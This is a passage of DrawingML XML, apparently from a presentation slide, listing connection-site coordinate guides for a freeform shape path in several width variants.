              <a:gd name="connsiteX82" fmla="*/ 533297 w 1371382"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 535120 w 1371382"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 521955 w 1371382"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 522456 w 1371382"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 510056 w 1371382"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 495241 w 1371382"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 495906 w 1371382"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 486774 w 1371382"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 473383 w 1371382"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 446113 w 1371382"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 388727 w 1371382"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 337645 w 1371382"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 317739 w 1371382"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 308462 w 1371382"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 295423 w 1371382"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 301422 w 1371382"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 304034 w 1371382"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 280363 w 1371382"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 270250 w 1371382"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 254467 w 1371382"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 251925 w 1371382"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 252918 w 1371382"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 244724 w 1371382"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 225902 w 1371382"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 202459 w 1371382"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 156258 w 1371382"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 128569 w 1371382"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 127695 w 1371382"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 108490 w 1371382"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 121570 w 1371382"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 114312 w 1371382"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 100397 w 1371382"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 108704 w 1371382"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 109892 w 1371382"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 114577 w 1371382"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 106859 w 1371382"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 96165 w 1371382"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 84901 w 1371382"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 86357 w 1371382"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 88593 w 1371382"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 81222 w 1371382"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 50630 w 1371382"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 29580 w 1371382"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 29138 w 1371382"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 14809 w 1371382"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 228 w 1371382"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 5239 w 1371382"/>
              <a:gd name="connsiteY128" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 20769 w 1371382"/>
              <a:gd name="connsiteY129" fmla="*/ 542923 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 71173 w 1371382"/>
              <a:gd name="connsiteY130" fmla="*/ 473479 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 59254 w 1371382"/>
              <a:gd name="connsiteY131" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 58502 w 1371382"/>
              <a:gd name="connsiteY132" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 58332 w 1371382"/>
              <a:gd name="connsiteY133" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 79842 w 1371382"/>
              <a:gd name="connsiteY134" fmla="*/ 309501 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 64025 w 1371382"/>
              <a:gd name="connsiteY135" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 81052 w 1371382"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 72762 w 1371382"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 85046 w 1371382"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 44600 w 1371382"/>
              <a:gd name="connsiteY139" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 44600 w 1371382"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1371382 w 1371382"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1371382 w 1371382"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 108076 w 1371382"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 144669 w 1371382"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 156169 w 1371382"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 180908 w 1371382"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 158465 w 1371382"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 173556 w 1371382"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 191000 w 1371382"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 205040 w 1371382"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 257997 w 1371382"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 273684 w 1371382"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 317389 w 1371382"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 300612 w 1371382"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 278027 w 1371382"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 285191 w 1371382"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 267936 w 1371382"/>
              <a:gd name="connsiteY17" fmla="*/ 6270265 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 294964 w 1371382"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 272956 w 1371382"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 271754 w 1371382"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 287169 w 1371382"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 274556 w 1371382"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 259785 w 1371382"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 309297 w 1371382"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 288372 w 1371382"/>
              <a:gd name="connsiteY25" fmla="*/ 5676393 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 327964 w 1371382"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 375094 w 1371382"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 388662 w 1371382"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 404643 w 1371382"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 438136 w 1371382"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 447735 w 1371382"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 458961 w 1371382"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 459981 w 1371382"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 467322 w 1371382"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 470625 w 1371382"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 471609 w 1371382"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 467243 w 1371382"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 473920 w 1371382"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 470853 w 1371382"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 477683 w 1371382"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 484719 w 1371382"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 487450 w 1371382"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 484154 w 1371382"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 485708 w 1371382"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 492617 w 1371382"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 488473 w 1371382"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 503876 w 1371382"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 509779 w 1371382"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 514512 w 1371382"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 515805 w 1371382"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 513612 w 1371382"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 509092 w 1371382"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 504175 w 1371382"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 500740 w 1371382"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 481393 w 1371382"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 485466 w 1371382"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 470722 w 1371382"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 471871 w 1371382"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 470447 w 1371382"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 456742 w 1371382"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 458340 w 1371382"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 451762 w 1371382"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 453093 w 1371382"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 457447 w 1371382"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 462525 w 1371382"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 485119 w 1371382"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 484544 w 1371382"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 484851 w 1371382"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 484878 w 1371382"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 483493 w 1371382"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 482377 w 1371382"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 484110 w 1371382"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 487853 w 1371382"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 487319 w 1371382"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 496015 w 1371382"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 503361 w 1371382"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 502657 w 1371382"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 506100 w 1371382"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 513638 w 1371382"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 515309 w 1371382"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 532872 w 1371382"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 533297 w 1371382"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 535120 w 1371382"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 521955 w 1371382"/>
              <a:gd name="connsiteY84" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 522456 w 1371382"/>
              <a:gd name="connsiteY85" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 510056 w 1371382"/>
              <a:gd name="connsiteY86" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 495241 w 1371382"/>
              <a:gd name="connsiteY87" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 495906 w 1371382"/>
              <a:gd name="connsiteY88" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 486774 w 1371382"/>
              <a:gd name="connsiteY89" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 473383 w 1371382"/>
              <a:gd name="connsiteY90" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 446113 w 1371382"/>
              <a:gd name="connsiteY91" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 388727 w 1371382"/>
              <a:gd name="connsiteY92" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 337645 w 1371382"/>
              <a:gd name="connsiteY93" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 317739 w 1371382"/>
              <a:gd name="connsiteY94" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 308462 w 1371382"/>
              <a:gd name="connsiteY95" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 295423 w 1371382"/>
              <a:gd name="connsiteY96" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 301422 w 1371382"/>
              <a:gd name="connsiteY97" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 304034 w 1371382"/>
              <a:gd name="connsiteY98" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 280363 w 1371382"/>
              <a:gd name="connsiteY99" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 270250 w 1371382"/>
              <a:gd name="connsiteY100" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 254467 w 1371382"/>
              <a:gd name="connsiteY101" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 251925 w 1371382"/>
              <a:gd name="connsiteY102" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 252918 w 1371382"/>
              <a:gd name="connsiteY103" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 244724 w 1371382"/>
              <a:gd name="connsiteY104" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 225902 w 1371382"/>
              <a:gd name="connsiteY105" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 202459 w 1371382"/>
              <a:gd name="connsiteY106" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 156258 w 1371382"/>
              <a:gd name="connsiteY107" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 128569 w 1371382"/>
              <a:gd name="connsiteY108" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 127695 w 1371382"/>
              <a:gd name="connsiteY109" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 108490 w 1371382"/>
              <a:gd name="connsiteY110" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 121570 w 1371382"/>
              <a:gd name="connsiteY111" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 114312 w 1371382"/>
              <a:gd name="connsiteY112" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 100397 w 1371382"/>
              <a:gd name="connsiteY113" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 108704 w 1371382"/>
              <a:gd name="connsiteY114" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 109892 w 1371382"/>
              <a:gd name="connsiteY115" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 114577 w 1371382"/>
              <a:gd name="connsiteY116" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 106859 w 1371382"/>
              <a:gd name="connsiteY117" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 96165 w 1371382"/>
              <a:gd name="connsiteY118" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 84901 w 1371382"/>
              <a:gd name="connsiteY119" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 86357 w 1371382"/>
              <a:gd name="connsiteY120" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 88593 w 1371382"/>
              <a:gd name="connsiteY121" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 81222 w 1371382"/>
              <a:gd name="connsiteY122" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 50630 w 1371382"/>
              <a:gd name="connsiteY123" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 29580 w 1371382"/>
              <a:gd name="connsiteY124" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 29138 w 1371382"/>
              <a:gd name="connsiteY125" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 14809 w 1371382"/>
              <a:gd name="connsiteY126" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 228 w 1371382"/>
              <a:gd name="connsiteY127" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 22148 w 1371382"/>
              <a:gd name="connsiteY128" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 20769 w 1371382"/>
              <a:gd name="connsiteY129" fmla="*/ 542923 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 71173 w 1371382"/>
              <a:gd name="connsiteY130" fmla="*/ 473479 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 59254 w 1371382"/>
              <a:gd name="connsiteY131" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 58502 w 1371382"/>
              <a:gd name="connsiteY132" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 58332 w 1371382"/>
              <a:gd name="connsiteY133" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 79842 w 1371382"/>
              <a:gd name="connsiteY134" fmla="*/ 309501 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 64025 w 1371382"/>
              <a:gd name="connsiteY135" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 81052 w 1371382"/>
              <a:gd name="connsiteY136" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 72762 w 1371382"/>
              <a:gd name="connsiteY137" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 85046 w 1371382"/>
              <a:gd name="connsiteY138" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 44600 w 1371382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13805 w 1364418"/>
              <a:gd name="connsiteY129" fmla="*/ 542923 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 64209 w 1364418"/>
              <a:gd name="connsiteY130" fmla="*/ 473479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72878 w 1364418"/>
              <a:gd name="connsiteY134" fmla="*/ 309501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64209 w 1364418"/>
              <a:gd name="connsiteY130" fmla="*/ 473479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72878 w 1364418"/>
              <a:gd name="connsiteY134" fmla="*/ 309501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72878 w 1364418"/>
              <a:gd name="connsiteY134" fmla="*/ 309501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81226 w 1364418"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987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81226 w 1364418"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987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54054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81226 w 1364418"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987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54054 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 90309 w 1364418"/>
              <a:gd name="connsiteY121" fmla="*/ 921368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22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
